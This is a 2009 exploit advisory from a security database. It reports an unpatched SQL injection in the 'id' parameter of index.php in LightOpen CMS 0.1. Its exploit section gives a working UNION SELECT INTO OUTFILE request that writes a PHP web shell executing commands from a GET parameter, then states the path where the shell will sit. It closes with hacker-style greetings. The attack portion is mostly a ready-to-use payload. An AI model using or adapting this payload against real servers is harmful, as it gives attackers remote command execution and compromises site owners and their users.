Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21946
HistoryJun 05, 2009 - 12:00 a.m.

SQL INJECTION VULNERABILITY--LightOpen CMS Devel 0.1-->

2009-06-0500:00:00
vulners.com
11

SQL INJECTION VULNERABILITY–LightOpen CMS Devel 0.1–>

CMS INFORMATION:

–>WEB: http://sourceforge.net/projects/lightopencms/
–>DOWNLOAD: http://sourceforge.net/projects/lightopencms/
–>DEMO: N/A
–>CATEGORY: CMS / Portal
–>DESCRIPTION: LightOpenCMS is a new CMS that in difference from other CMS
softwares have the CMS and the CMS admin in different packages…
–>RELEASED: 2009-05-15

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: N/A
–>CATEGORY: SQL INJECTION
–>AFFECT VERSION: CURRENT
–>Discovered Bug date: 2009-06-02
–>Reported Bug date: 2009-06-02
–>Fixed bug date: Not fixed
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################

<<<<---------++++++++++++++ Condition: magic quotes=OFF ++++++++++++++++±-------->>>>


PROOFS OF CONCEPT:

[++] GET var –> 'id'

[++] File vuln –> 'index.php'




[++[Return]++] ~~~~~&gt; User and version in DB.


----------
EXPLOITS:
----------


&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: Permission to create files +++++++++++++++++---------&gt;&gt;&gt;&gt;



~~~~~&gt; http://[HOST]/[PATH]/index.php?id=1&#37;27+UNION+ALL+SELECT+&#39;&lt;HTML&gt;&lt;title&gt;LightOpen CMS 0.1 pre-alpha--SHELL BY
--Y3NH4CK3R--&gt;&lt;/title&gt;&lt;body text=ffffff bgcolor=000000&gt;&lt;center&gt;&#39;,&#39;&lt;h1&gt;YOUR SHELL IS ON!&lt;br&gt;&lt;/h1&gt;&lt;/center&gt;&lt;br&gt;&lt;br&gt;&#39;,&#39;&lt;font
color=ff0000&gt;&lt;h2&gt;Get var &#40;cmd&#41; to execute comands. Enjoy it!&lt;/h2&gt;&lt;/font&gt;&lt;h3&gt;Command Result:&lt;/h3&gt;&lt;?php system&#40;$_GET[cmd]&#41;;
?&gt;&#39;,&#39;&lt;br&gt;&lt;br&gt;&lt;font color=ff0000&gt;&lt;h3&gt;By y3nh4ck3r. Contact:
[email protected]&lt;/h3&gt;&lt;/font&gt;&lt;/body&gt;&lt;/HTML&gt;&#39;+INTO+OUTFILE+&#39;[COMPLETE-PATH]/shell.php&#39;&#37;23



[++[Return]++] ~~~~~&gt; Your shell in --&gt; http://[HOST]/[PATH]/shell.php.



#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################